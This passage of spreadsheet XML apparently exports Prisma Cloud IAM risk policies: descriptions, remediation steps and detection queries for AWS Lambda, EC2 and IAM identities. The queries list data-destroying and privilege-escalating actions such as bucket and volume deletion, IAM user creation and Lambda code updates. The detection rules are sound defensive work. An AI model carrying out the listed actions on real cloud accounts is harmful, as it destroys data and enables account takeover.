          <t>With access to  's3:DeleteBucket', 'rds:DeleteDBCluster', 'rds:DeleteDBInstance', 'rds:DeleteDBSnapshot', 'rds:DeleteDBClusterSnapshot', 'rds:DeleteGlobalCluster', 'ec2:DeleteSnapshot', 'ec2:DeleteVolume'  permissions an adversary can destroy sensitive information stored in your cloud resources, making irreversible damage to your organization</t>
        </is>
      </c>
      <c r="X3198"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19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8" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ( 's3:DeleteBucket', 'rds:DeleteDBCluster', 'rds:DeleteDBInstance', 'rds:DeleteDBSnapshot', 'rds:DeleteDBClusterSnapshot', 'rds:DeleteGlobalCluster', 'ec2:DeleteSnapshot', 'ec2:DeleteVolume' ) AND source.cloud.service.name = 'lambda'</t>
        </is>
      </c>
      <c r="AA3198" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3198" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3198" t="inlineStr"/>
      <c r="AD3198" t="b">
        <v>1</v>
      </c>
      <c r="AE3198" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3198" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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8" t="inlineStr">
        <is>
          <t>32da183f-6263-4661-a2fd-fd18659013eb</t>
        </is>
      </c>
      <c r="AI3198" t="inlineStr">
        <is>
          <t>32da183f-6263-4661-a2fd-fd18659013eb</t>
        </is>
      </c>
      <c r="AJ3198" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3198" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3199">
      <c r="A3199" t="inlineStr"/>
      <c r="B3199" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3199" s="2" t="inlineStr"/>
      <c r="D3199" t="inlineStr"/>
      <c r="E3199" t="inlineStr"/>
      <c r="F3199" t="inlineStr"/>
      <c r="G3199" t="b">
        <v>1</v>
      </c>
      <c r="H31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199" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3199" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3199" t="inlineStr">
        <is>
          <t>Azure AD user with effective permissions to create AWS IAM users</t>
        </is>
      </c>
      <c r="L3199" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3199" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3199" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3199" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3199" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3199" t="inlineStr"/>
      <c r="R3199" t="inlineStr"/>
      <c r="S3199" t="inlineStr"/>
      <c r="T3199" t="b">
        <v>1</v>
      </c>
      <c r="U3199" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3199" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3199" t="inlineStr">
        <is>
          <t>This policy identifies Azure AD users that can create an AWS IAM user. This can possibly lead to a backdoor in the cloud environment. Ensure that Azure AD users have the least privilege access by granting only the permissions required to perform a task, instead of providing excessive permissions</t>
        </is>
      </c>
      <c r="X3199" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the Azure AD console
2. Find the role used by the Azure AD user
3. Log in to the AWS console
4. Log in to the AWS console
5. Navigate to the IAM service
6. Click on Roles
7. Choose the relevant role
8. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the action</t>
        </is>
      </c>
      <c r="Y319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199" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.idp.service = 'Azure Active Directory' and action.name = 'IAM:CreateUser'</t>
        </is>
      </c>
      <c r="AA3199" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3199" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3199" t="inlineStr"/>
      <c r="AD3199" t="b">
        <v>1</v>
      </c>
      <c r="AE3199" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3199" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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199" t="inlineStr">
        <is>
          <t>385eee00-d051-41c6-9fb9-3e74c6c21be8</t>
        </is>
      </c>
      <c r="AI3199" t="inlineStr">
        <is>
          <t>385eee00-d051-41c6-9fb9-3e74c6c21be8</t>
        </is>
      </c>
      <c r="AJ3199" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3199" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3200">
      <c r="A3200" t="inlineStr"/>
      <c r="B3200" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3200" s="2" t="inlineStr"/>
      <c r="D3200" t="n">
        <v>0</v>
      </c>
      <c r="E3200" t="n">
        <v>103</v>
      </c>
      <c r="F3200" t="n">
        <v>0</v>
      </c>
      <c r="G3200" t="b">
        <v>1</v>
      </c>
      <c r="H32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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3200" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3200" t="inlineStr">
        <is>
          <t>AWS Lambda with write permissions on security group</t>
        </is>
      </c>
      <c r="L3200" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3200" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3200" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3200" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3200" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3200" t="inlineStr"/>
      <c r="R3200" t="inlineStr"/>
      <c r="S3200" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3200" t="b">
        <v>1</v>
      </c>
      <c r="U3200" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3200" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3200" t="inlineStr">
        <is>
          <t>This Policy identifies aws lambda with permissions control security group access to various AWS services, including RDS, EC2, and Redshift. They enable actions such as creating and deleting security groups, modifying access rules, and associating security groups with load balancers. While granting these permissions can enhance operational flexibility, it is crucial to exercise caution. Mishandling these permissions could lead to unauthorized access, misconfigurations, or potential data breaches.  It is recommended to assign and manage these permissions to trusted individuals to maintain security posture for AWS resources.</t>
        </is>
      </c>
      <c r="X320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0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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('rds:CreateDBSecurityGroup','rds:DeleteDBSecurityGroup','rds:RevokeDBSecurityGroupIngress','ec2:AuthorizeSecurityGroupEgress','ec2:AuthorizeSecurityGroupIngress','ec2:CreateSecurityGroup','ec2:DeleteSecurityGroup','ec2:ModifySecurityGroupRules','ec2:RevokeSecurityGroupEgress','ec2:RevokeSecurityGroupIngress','elasticloadbalancing:ApplySecurityGroupsToLoadBalancer','elasticloadbalancing:SetSecurityGroups','redshift:AuthorizeClusterSecurityGroupIngress','redshift:CreateClusterSecurityGroup','redshift:DeleteClusterSecurityGroup') AND source.cloud.service.name = 'lambda'</t>
        </is>
      </c>
      <c r="AA3200" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3200" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3200" t="inlineStr"/>
      <c r="AD3200" t="b">
        <v>1</v>
      </c>
      <c r="AE3200" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3200" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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0" t="inlineStr">
        <is>
          <t>f772af58-8a9c-4acb-9d8b-c95ee0f33e10</t>
        </is>
      </c>
      <c r="AI3200" t="inlineStr">
        <is>
          <t>f772af58-8a9c-4acb-9d8b-c95ee0f33e10</t>
        </is>
      </c>
      <c r="AJ3200" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3200" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3201">
      <c r="A3201" t="inlineStr"/>
      <c r="B3201" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3201" s="2" t="inlineStr"/>
      <c r="D3201" t="n">
        <v>0</v>
      </c>
      <c r="E3201" t="n">
        <v>125</v>
      </c>
      <c r="F3201" t="n">
        <v>0</v>
      </c>
      <c r="G3201" t="b">
        <v>1</v>
      </c>
      <c r="H32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01" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3201" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3201" t="inlineStr">
        <is>
          <t>AWS Lambda Function with administrative permissions</t>
        </is>
      </c>
      <c r="L3201" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3201" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3201" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3201" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3201" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3201" t="inlineStr"/>
      <c r="R3201" t="inlineStr"/>
      <c r="S3201" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3201" t="b">
        <v>1</v>
      </c>
      <c r="U3201" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3201" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3201" t="inlineStr">
        <is>
          <t>Identifies Lambda Functions granted administrative permissions, increasing the blast radius in case of a potential comrpomise of the function.</t>
        </is>
      </c>
      <c r="X3201" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Asset Name", the "View JSON{}"
2. Scroll down to the "data" field, and under "role" make note of the role listed
3. Still in the Prisma Cloud Console, select 'Investigate'
4. Paste the following query into the investigation prompt, replacing the placeholder with the name of the role you obtained in the previous steps: config from iam where dest.cloud.type = 'AWS' AND grantedby.cloud.entity.name ='&lt;role name&gt;'
5. In the results, under "Granted By Policy", you will see the policies attached to the service account
Once examining the policies and determining which permissions are unnecessary and can be removed based on the Lambda Function's intended use, sign in to your AWS account. In order to remove any unnecessary permissions , use the following remediation steps:
Navigate to the IAM service, and search for the role. Remove the relevant policy for a less privileged one sufficient for the Function's intended purpose
 Note: Before editing the role's permissions, make sure no other entities are using it. If they are, an alternative approach is to create a different role with suitable permissions and attach it to the Lambda instead of the existing role</t>
        </is>
      </c>
      <c r="Y320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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.access.isAdministrative = true AND source.cloud.service.name = 'lambda'</t>
        </is>
      </c>
      <c r="AA3201" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3201" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3201" t="inlineStr"/>
      <c r="AD3201" t="b">
        <v>1</v>
      </c>
      <c r="AE3201" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3201" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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01" t="inlineStr">
        <is>
          <t>fa6d2f2f-d5dc-44c3-b540-6f9bbd8d0eb2</t>
        </is>
      </c>
      <c r="AI3201" t="inlineStr">
        <is>
          <t>fa6d2f2f-d5dc-44c3-b540-6f9bbd8d0eb2</t>
        </is>
      </c>
      <c r="AJ3201" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3201" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3202">
      <c r="A3202" t="inlineStr"/>
      <c r="B3202" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3202" s="2" t="inlineStr"/>
      <c r="D3202" t="inlineStr"/>
      <c r="E3202" t="inlineStr"/>
      <c r="F3202" t="inlineStr"/>
      <c r="G3202" t="b">
        <v>1</v>
      </c>
      <c r="H32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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3202" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3202" t="inlineStr">
        <is>
          <t>AWS EC2 instance with data destruction permissions</t>
        </is>
      </c>
      <c r="L3202" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3202" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3202" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3202" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3202" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3202" t="inlineStr"/>
      <c r="R3202" t="inlineStr"/>
      <c r="S3202" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3202" t="b">
        <v>1</v>
      </c>
      <c r="U3202" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3202" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3202" t="inlineStr">
        <is>
          <t>With access to 's3:DeleteBucket', 'rds:DeleteDBCluster', 'rds:DeleteDBInstance', 'rds:DeleteDBSnapshot', 'rds:DeleteDBClusterSnapshot', 'rds:DeleteGlobalCluster', 'ec2:DeleteSnapshot', 'ec2:DeleteVolume' permissions an adversary can destroy sensitive information stored in your cloud resources, making irreversible damage to your organization</t>
        </is>
      </c>
      <c r="X3202"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0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2" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ( 's3:DeleteBucket', 'rds:DeleteDBCluster', 'rds:DeleteDBInstance', 'rds:DeleteDBSnapshot', 'rds:DeleteDBClusterSnapshot', 'rds:DeleteGlobalCluster', 'ec2:DeleteSnapshot', 'ec2:DeleteVolume' ) AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3202" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3202" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3202" t="inlineStr"/>
      <c r="AD3202" t="b">
        <v>1</v>
      </c>
      <c r="AE3202" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3202" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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2" t="inlineStr">
        <is>
          <t>9cb7793b-f29e-4544-a9ba-451be9c3e3e8</t>
        </is>
      </c>
      <c r="AI3202" t="inlineStr">
        <is>
          <t>9cb7793b-f29e-4544-a9ba-451be9c3e3e8</t>
        </is>
      </c>
      <c r="AJ3202" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3202" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3203">
      <c r="A3203" t="inlineStr"/>
      <c r="B3203" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3203" s="2" t="inlineStr"/>
      <c r="D3203" t="n">
        <v>0</v>
      </c>
      <c r="E3203" t="n">
        <v>0</v>
      </c>
      <c r="F3203" t="n">
        <v>319</v>
      </c>
      <c r="G3203" t="b">
        <v>1</v>
      </c>
      <c r="H320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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3203" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3203" t="inlineStr">
        <is>
          <t>AWS Users and Machine Identities with IAM Metadata Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3203" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3203" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3203" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3203" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3203" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3203" t="inlineStr"/>
      <c r="R3203" t="inlineStr"/>
      <c r="S3203" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3203" t="b">
        <v>1</v>
      </c>
      <c r="U3203" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3203" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3203" t="inlineStr">
        <is>
          <t>This policy identifies IAM Users with unused Metadata Write Permissions. AWS Identity and Access Management (IAM) users with "Metadata Write" permissions can modify instance metadata. While powerful, leaving such users unused for 90 days creates a security risk:
- Dormant Threat: An attacker might exploit inactive credentials to gain access. Once activated, these permissions allow modifying instance metadata to potentially steal data or install malware.
- Privilege Escalation: These permissions can be used to elevate privileges and gain further control within the cloud environment.
Unused privileged accounts are attractive targets for attackers. To mitigate this risk:
Regular Review: Identify and disable unused IAM users with Metadata Write permissions.
Minimize Permissions: Grant "Metadata Write" only when absolutely necessary and for a limited time.
MFA Enforcement: Enforce Multi-Factor Authentication (MFA) to add an extra layer of security.</t>
        </is>
      </c>
      <c r="X3203"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t>
        </is>
      </c>
      <c r="Y320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3" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and action.access.level = 'Metadata Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3203" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3203" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3203" t="inlineStr"/>
      <c r="AD3203" t="b">
        <v>1</v>
      </c>
      <c r="AE3203" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3203" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG320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3" t="inlineStr">
        <is>
          <t>8cdc696f-6b0e-4e83-81c3-e7030dd68b5e</t>
        </is>
      </c>
      <c r="AI3203" t="inlineStr">
        <is>
          <t>8cdc696f-6b0e-4e83-81c3-e7030dd68b5e</t>
        </is>
      </c>
      <c r="AJ3203" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3203" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3204">
      <c r="A3204" t="inlineStr"/>
      <c r="B3204" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3204" s="2" t="inlineStr"/>
      <c r="D3204" t="inlineStr"/>
      <c r="E3204" t="inlineStr"/>
      <c r="F3204" t="inlineStr"/>
      <c r="G3204" t="b">
        <v>1</v>
      </c>
      <c r="H32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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3204" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3204" t="inlineStr">
        <is>
          <t>AWS IAM User with IAM write permissions</t>
        </is>
      </c>
      <c r="L3204" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3204" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3204" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3204" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3204" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3204" t="inlineStr"/>
      <c r="R3204" t="inlineStr"/>
      <c r="S3204" t="inlineStr"/>
      <c r="T3204" t="b">
        <v>1</v>
      </c>
      <c r="U3204" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3204" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3204" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow IAM users to perform write operations for IAM. such as creating, deleting, updating access keys, users, groups, and roles.  IAM write permissions are very risky and should only be used under very strict controls.  Unnecessary usage of these permissions can significantly increase your attack surface and make it easier for attackers to compromise your AWS environment.</t>
        </is>
      </c>
      <c r="X3204" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the IAM service
3. Click on Users
4. Choose the relevant user
5. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y320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4" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('iam:AddClientIDToOpenIDConnectProvider','iam:AddRoleToInstanceProfile','iam:AddUserToGroup','iam:ChangePassword','iam:CreateAccessKey','iam:CreateAccountAlias','iam:CreateGroup','iam:CreateInstanceProfile','iam:CreateLoginProfile','iam:CreateOpenIDConnectProvider','iam:CreateRole','iam:CreateSAMLProvider','iam:CreateServiceLinkedRole','iam:CreateServiceSpecificCredential','iam:CreateUser','iam:CreateVirtualMFADevice','iam:DeactivateMFADevice','iam:DeleteAccessKey','iam:DeleteAccountAlias','iam:DeleteGroup','iam:DeleteInstanceProfile','iam:DeleteLoginProfile','iam:DeleteOpenIDConnectProvider','iam:DeleteRole','iam:DeleteSAMLProvider','iam:DeleteSSHPublicKey','iam:DeleteServerCertificate','iam:DeleteServiceLinkedRole','iam:DeleteServiceSpecificCredential','iam:DeleteSigningCertificate','iam:DeleteUser','iam:DeleteVirtualMFADevice','iam:EnableMFADevice','iam:PassRole','iam:RemoveClientIDFromOpenIDConnectProvider','iam:RemoveRoleFromInstanceProfile','iam:RemoveUserFromGroup','iam:ResetServiceSpecificCredential','iam:ResyncMFADevice','iam:SetSecurityTokenServicePreferences','iam:UpdateAccessKey','iam:UpdateAccountPasswordPolicy','iam:UpdateGroup','iam:UpdateLoginProfile','iam:UpdateOpenIDConnectProviderThumbprint','iam:UpdateRole','iam:UpdateRoleDescription','iam:UpdateSAMLProvider','iam:UpdateSSHPublicKey','iam:UpdateServerCertificate','iam:UpdateServiceSpecificCredential','iam:UpdateSigningCertificate','iam:UpdateUser','iam:UploadSSHPublicKey','iam:UploadServerCertificate','iam:UploadSigningCertificate') AND source.cloud.service.name = 'iam' and source.cloud.resource.type = 'user'</t>
        </is>
      </c>
      <c r="AA3204" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3204" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3204" t="inlineStr"/>
      <c r="AD3204" t="b">
        <v>1</v>
      </c>
      <c r="AE3204" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3204" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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4" t="inlineStr">
        <is>
          <t>99868a5a-9824-4da2-b413-ec5b1632b722</t>
        </is>
      </c>
      <c r="AI3204" t="inlineStr">
        <is>
          <t>99868a5a-9824-4da2-b413-ec5b1632b722</t>
        </is>
      </c>
      <c r="AJ3204" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3204" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3205">
      <c r="A3205" t="inlineStr"/>
      <c r="B3205" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3205" s="2" t="inlineStr"/>
      <c r="D3205" t="n">
        <v>0</v>
      </c>
      <c r="E3205" t="n">
        <v>9</v>
      </c>
      <c r="F3205" t="n">
        <v>0</v>
      </c>
      <c r="G3205" t="b">
        <v>1</v>
      </c>
      <c r="H32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05" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3205" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3205" t="inlineStr">
        <is>
          <t>Service Account with a lateral movement finding to admin through code execution on compute resources</t>
        </is>
      </c>
      <c r="L3205" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3205" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3205" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3205" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3205" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3205" t="inlineStr"/>
      <c r="R3205" t="inlineStr"/>
      <c r="S3205" t="inlineStr"/>
      <c r="T3205" t="b">
        <v>1</v>
      </c>
      <c r="U3205" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3205" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3205" t="inlineStr">
        <is>
          <t>Identifies service accounts with permissions to execute code on privileged compute resources. This allows the service account to execute code using the compute resource's privileges. As such, a compromise of such a service account could allow an adversary to escalate their privileges and further themselves within the environment.</t>
        </is>
      </c>
      <c r="X3205" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the source role ("Source"), their permission grantor ("Granted By Entity"), the action which allows code execution ("Action") and the administrative compute resource ("Destination").
In order to remove any administrative permissions and minimize the potential privilege escalation avenues, use the following remediation steps:
Browse to the permission grantor ("Granted By Entity") in the AWS Console. Select the 'Permissions' tab, and search for the action and scope we observed in the "investigate" page ("Action", "Destination").  If deemed unnecessary, remove the permissions by either editing the policy or replacing it (notice: editing a customer managed policy could affect other roles). Lastly, review the permissions given to the compute resource ("Destination") and remove if deemed unnecessary.</t>
        </is>
      </c>
      <c r="Y320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5" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND grantedby.cloud.entity.type = 'role' AND source.cloud.resource.isadministrative = false AND action.name IN ( 'ec2:ModifyInstanceAttribute', 'ec2-instance-connect:SendSSHPublicKey', 'ec2-instance-connect:SendSerialConsoleSSHPublicKey', 'lambda:UpdateFunctionCode', 'lambda:UpdateFunctionConfiguration', 'lambda:AddPermission', 'glue:UpdateDevEndpoint'  ) AND dest.cloud.resource.type IN ( 'Instance', 'function', 'devendpoint') AND dest.cloud.resource.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3205" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3205" t="inlineStr">
        <is>
          <t>2024-10-31 16:26:42</t>
        </is>
      </c>
      <c r="AC3205" t="inlineStr"/>
      <c r="AD3205" t="b">
        <v>1</v>
      </c>
      <c r="AE3205" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3205" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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05" t="inlineStr">
        <is>
          <t>0def7696-9ca5-4dc2-a578-669d203274c0</t>
        </is>
      </c>
      <c r="AI3205" t="inlineStr">
        <is>
          <t>0def7696-9ca5-4dc2-a578-669d203274c0</t>
        </is>
      </c>
      <c r="AJ3205" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3205" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3206">
      <c r="A3206" t="inlineStr"/>
      <c r="B3206" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3206" s="2" t="inlineStr"/>
      <c r="D3206" t="inlineStr"/>
      <c r="E3206" t="inlineStr"/>
      <c r="F3206" t="inlineStr"/>
      <c r="G3206" t="b">
        <v>1</v>
      </c>
      <c r="H32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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3206" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3206" t="inlineStr">
        <is>
          <t>AWS IAM Groups and Roles with IAM Metadata Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3206" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3206" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3206" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3206" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3206" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
